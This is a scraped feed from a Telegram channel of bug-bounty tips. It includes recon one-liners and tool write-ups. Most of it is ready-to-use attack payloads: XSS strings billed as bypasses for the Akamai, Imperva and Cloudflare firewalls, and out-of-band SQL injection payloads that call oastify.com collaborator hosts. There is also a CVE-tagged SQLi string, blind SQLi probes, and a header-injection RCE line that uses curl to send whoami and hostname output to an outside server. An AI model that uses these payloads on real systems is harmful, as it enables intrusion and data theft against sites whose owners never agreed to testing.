BugCod3

📣

Please open Telegram to view this post

VIEW IN TELEGRAM

❤4⚡2🔥2

1.61K views00:02

A quick way to find "all" paths for Next.js websites:

console.log(__BUILD_MANIFEST.sortedPages)

👩‍💻 javascript:
console.log(__BUILD_MANIFEST.sortedPages.join('\n'));

#BugBounty #Tips #JS

➖

👤

📣

Please open Telegram to view this post

VIEW IN TELEGRAM

🔥8❤3⚡2👍1

1.89K views14:24

Add to your wordlist:

auth/jwt/register
auth-demo/register/classic
auth-demo/register/modern

#BugBounty #Tips
➖➖➖➖➖➖➖➖➖➖
👤 t.iss.one/BugCod3BOT
📣 t.iss.one/BugCod3

❤5⚡3🔥3👍1

1.86K views17:51

WAF AKAMAI Bypass
Lead to 30 XSS in large BBP🤯

"><input type="hidden" oncontentvisibilityautostatechange="confirm(/Bypassed/)" style="content-visibility:auto">

#BugBounty #Tips #Waf
➖➖➖➖➖➖➖➖➖➖
👤 t.iss.one/BugCod3BOT
📣 t.iss.one/BugCod3

❤5🔥5⚡3👍1

2.11K views16:50

Out-of-Band SQL Injection

Payload:

'11111111111' AND (SELECT LOAD_FILE('\\\\https://xde3imh45q8x9o4ovz1kea6cd3ju7kv9.oastify.com\\a'))

'11111111111' AND (SELECT CONCAT('', (SELECT SLEEP(5)), (SELECT LOAD_FILE(CONCAT('\\\\', (SELECT 'https://14379q88wuz10svsm3so5exg47ayyqmf.oastify.com/a'))))))

#BugBounty #Tips #SQL
➖➖➖➖➖➖➖➖➖➖
👤 t.iss.one/BugCod3BOT
📣 t.iss.one/BugCod3

❤3👍3🔥2⚡1

2.25K views18:52

Extract all endpoints from a JS File and take your bug 🐞

#BugBounty #Tips
➖➖➖➖➖➖➖➖➖➖
👤 t.iss.one/BugCod3BOT
📣 t.iss.one/BugCod3

🔥5❤4👍3⚡1

2.42K views16:50

Finding Hidden Parameter & Potential XSS with Arjun + KXSS

arjun -q -u target -oT arjun && cat arjun | awk -F'[?&]' '{baseUrl=$1; for(i=2; i<=NF; i++) {split($i, param, "="); print baseUrl "?" param[1] "="}}' | kxss

#BugBounty #Tips
➖➖➖➖➖➖➖➖➖➖
📣 t.iss.one/Root_Exploit
📣 t.iss.one/BugCod3

❤3⚡2🔥2

2.58K views12:03

SQLI Injection
CVE: 2024-36837

Payload:

0-3661)%20OR%20MAKE_SET(8165=8165,7677)%20AND%20(4334=4334

#BugBounty #Tips

➖

👤

📣

Please open Telegram to view this post

VIEW IN TELEGRAM

❤2⚡2🔥2

1.95K views12:03

JS Recon for IP, Hostname, URL from Waybackurls + LazyEgg

waybackurls target | grep '\.js$' | awk -F '?' '{print $1}' | sort -u | xargs -I{} bash -c 'python lazyegg[.]py "{}" --js_urls --domains --ips' > jsurls && cat jsurls | grep '\.' | sort -u

#BugBounty #Tips

➖

👤

📣

Please open Telegram to view this post

VIEW IN TELEGRAM

⚡3❤2🔥2👍1

2.19K views13:14

XSS in Office.com. The + made a difference.

Payload:‍‍‍

`'>+<script>alert()</script>`

#BugBounty #Tips #XSS

➖

👤

📣

Please open Telegram to view this post

VIEW IN TELEGRAM

⚡6🔥6❤3

2.31K views18:51

XSS

Watch out for reflected XSS in the search parameter!

Payload:

"-->""/>Hack by Fagun</script><deTailS open x=">" ontoggle=(co\u006efirm)``>"

#XSS #BugBounty #Tips

➖

👤

📣

Please open Telegram to view this post

VIEW IN TELEGRAM

🔥6❤4⚡3👍3

2.3K views12:03

Export to GBounty

💬

Export to GBounty is a Burp Suite extension developed using the Montoya API. It allows users to export selected HTTP requests from Burp Suite, including the Site Map Tree, Repeater, and Message Editor, into a compressed ZIP file. This ZIP file can be directly used with the GBounty scanner using the command ‍`gbounty -rf requests.zip`, enabling streamlined vulnerability scanning and management.

📊

Features:

⚪️

Effortless Export: Easily export selected HTTP requests from multiple sources within Burp Suite.

⚪️

Compressed Format: Saves requests in a ZIP archive, optimizing storage and transfer.
Unique File Naming: Each request is saved as a uniquely named text file within the ZIP to prevent conflicts.

⚪️

Wide Compatibility: Supports exporting from Site Map Tree, Repeater, Message Editor, and other compatible tools.

⚪️

User-Friendly Interface: Adds a context menu option "Export to GBounty" for a seamless user experience.

⚪️

Robust Error Handling: Provides clear notifications regarding the export status, including overwrite confirmations and error messages.

🔼

Installation:
Prerequisites

⚪️

Java Development Kit (JDK): Ensure you have JDK 8 or higher installed.

⚪️

Burp Suite: The extension is compatible with Burp Suite Professional and Burp Suite Community.

💻

Usage:
Select Requests to Export:

Within Burp Suite, select the HTTP requests you wish to export from the Site Map Tree, Repeater, Message Editor, or other supported tools.

📂 Export Requests:
Right-click on the selected requests. Choose the Export to GBounty option from the context menu.

📂 Run GBounty Scanner:
Use the exported ZIP file with the GBounty scanner by executing the following command in your terminal:

gbounty -rf requests.zip

😸

Github

⬇️

Download

🔒

BugCod3

#BugBounty #Tips #GBounty

➖

👤

📣

Please open Telegram to view this post

VIEW IN TELEGRAM

⚡4❤3🔥3👍1

2.57K views16:50

XٓSS

Bypass #Akamai, #Imperva and #CloudFlare WAF 🧱🔥

<A HRef=//X55.is AutoFocus %26%2362 OnFocus%0C=import(href)>

#BugBounty #Tips #Bypass

➖

👤

📣

Please open Telegram to view this post

VIEW IN TELEGRAM

🔥6⚡3❤3

3.06K views10:52

HACKER search engines

#BugBounty #Search #Engines #Tips

➖

👤

📣

Please open Telegram to view this post

VIEW IN TELEGRAM

🔥7⚡3❤3

2.7K views16:50

RCE - Can we still use this in HTTP Header?

`
'
;
$
>

curl${IFS}$(whoami)-$(hostname)-$(hostname${IFS}-i)[.]your-interact-server

#BugBounty #Tips

➖

👤

📣

Please open Telegram to view this post

VIEW IN TELEGRAM

❤5⚡3🔥3

3.03K views07:41

JSNinja - "Hunting Bugs in JavaScript!"

💬

JSNinja is a powerful tool for extracting URLs and sensitive information from JavaScript files. It's designed for security enthusiasts,BugHunters and developers.

📊

Features:
➕ Extract URLs from JavaScript files!
➕ Identify sensitive information such as API keys and tokens!
➕ User-friendly interface!
➕Open Source and actively maintained!

🔼

Installation:

sudo apt update
sudo apt install git python3 python3-pip -y
cd JSNinja
pip3 install -r requirements.txt

💻

Usage:

python3 jsninja.py -u https://example.com/script.js --secrets --urls

Command-Line Options:

⚪️

-u or --url: Specify a single JavaScript URL to fetch.

⚪️

--secrets: Look for sensitive information in the JavaScript content.

⚪️

--urls: Extract URLs from the JavaScript content.

⚪️

-o or --output_file: Specify the file to save extracted links (default: extracted_links.txt).

😸

Github

⬇️

Download

🔒

BugCod3

#BugBounty #JS #Tips

➖

👤

📣

Please open Telegram to view this post

VIEW IN TELEGRAM

👍8❤5⚡3🔥3

3.88K views10:52

Top 25 server-side request forgery (SSRF) parameters

Here are the top 25 parameters that could be vulnerable to server-side request forgery (SSRF) vulnerability:

?dest={target}
?redirect={target}
?uri={target}
?path={target}
?continue={target}
?url={target}
?window={target}
?next={target}
?data={target}
?reference={target}
?site={target}
?html={target}
?val={target}
?validate={target}
?domain={target}
?callback={target}
?return={target}
?page={target}
?feed={target}
?host={target}
?port={target}
?to={target}
?out={target}
?view={target}
?dir={target}

Next time you encounter such parameters in an URL, get notice because SSRF is a critical vulnerability that may allow you to:

⚪️ Access services on the loopback interface of the remote server
⚪️ Scan internal network an potentially interact with internal services
⚪️ Read local files on the server using file:// protocol handler
⚪️ Move laterally / pivoting into the internal environment

#SSRF #BugBounty #Tips

➖

👤

📣

Please open Telegram to view this post

VIEW IN TELEGRAM

❤4🔥4⚡2

4.39K views10:52

Useful Wireshark Filters

#WireShark #Tips
➖➖➖➖➖➖➖➖➖➖
👤 t.iss.one/BugCod3BOT
📣 t.iss.one/BugCod3

🔥5⚡2❤2

1.9K views18:40

SQL injection ID parameter

?id=1' order by 1 --+
?id=1' and "a"="a"--+
?id=1' and database()="securtiy"--+
?id=1' and substring(database(),1,1)="a"--+
?id=1' and sleep(2) and "a"="a"--+
?id=1' and sleep(2) and substring(database(),1,1)="a"--+

#SQL #Injection #Tips
➖➖➖➖➖➖➖➖➖➖
👤 t.iss.one/BugCod3BOT
📣 t.iss.one/BugCod3

🔥5❤3⚡1

1.75K views20:32